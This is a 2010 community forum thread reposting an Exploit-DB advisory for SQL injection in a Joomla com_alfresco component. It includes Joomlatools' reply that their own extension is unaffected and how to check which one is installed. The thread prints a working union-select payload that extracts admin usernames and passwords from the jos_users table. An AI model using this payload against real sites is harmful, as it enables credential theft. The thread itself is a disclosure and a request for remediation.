Hyland Community
Help
cancel
Turn on suggestions
Auto-suggest helps you quickly narrow down your search results by suggesting possible matches as you type.
Showing results for 
Search instead for 
Did you mean: 

Joomla Component com_alfresco SQL Injection Vulnerability

morze
Champ in-the-making
Champ in-the-making

‎01-19-2010 05:56 AM

http://www.exploit-db.com/exploits/10952

# Title: Joomla Component com_alfresco SQL Injection Vulnerability
# EDB-ID: 10952
# CVE-ID: ()
# OSVDB-ID: ()
# Author: FL0RiX
# Published: 2010-01-03
# Verified: no
# Download Exploit Code
# Download N/A
#############################################################
#  Joomla Component com_alfresco SQL Injection Vulnerability
#############################################################
# Author          : FL0RiX
# Name            : com_alfresco
# Greez           : PyskE,Dr.Kacak And All Friends
# Bug Type        : SQL Injection
# Infection       : Admin login bilgileri alinabilir.
# Demo Vuln.      :
http://server/index.php?option=com_alfresco&task=edit&id_pan=[SQL INJ.]
# Bug Fix Advice : Zararli karakterler filtrelenmelidir.
#############################################################
< – bug code start – >
path/index.php?option=com_alfresco&task=edit&id_pan=null/**/union/**/select/**/1,2,3,concat(username,0x3a,password)fl0rixf0r3v3r,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21/**/from/**/jos_users–
< – bug code end of – >

How to rectify an error?


Update:
http://blog.joomlatools.eu/2010/01/security-in-third-party-addons.html
"We have investigated this report, and it does not concern the Joomla:Alfresco integration that was published through Joomlatools Labs over a year ago. We have been unable to find the developer of this extension, so we believe it might be a custom extension that is not available on the JED. If you have more information, please let us know.

If you have an Alfresco extension installed, you can identify it by opening /administrator/components/com_alfresco/manifest.xml. If it starts with the following header, you are using our secure extension. If it doesn't, you might be using the vulnerable extension.

<name>Alfresco</name>
<author>Joomlatools</author>
<copyright>Copyright (C) 2008 Joomlatools. All rights reserved.</copyright>
<creationdate>December 2008</creationdate>
<license>http://www.gnu.org/licenses/gpl-2.0.html GNU/GPL</license>
<authoremail>info@joomlatools.org</authoremail>
<authorurl>www.joomlatools.org</authorurl>
<version>1.0.0</version>
<description>This component displays an Alfresco repository using CMIS</description>
"
Labels:
0 Kudos
1 REPLY 1

hax2010
Champ in-the-making
Champ in-the-making

‎02-26-2010 05:34 AM

Thanks for this nice post. this is so useful for me.
0 Kudos
Getting started

Tags

Find what you came for

We want to make your experience in Hyland Connect as valuable as possible, so we put together some helpful links.

Copyright © 2025 Khoros, LLC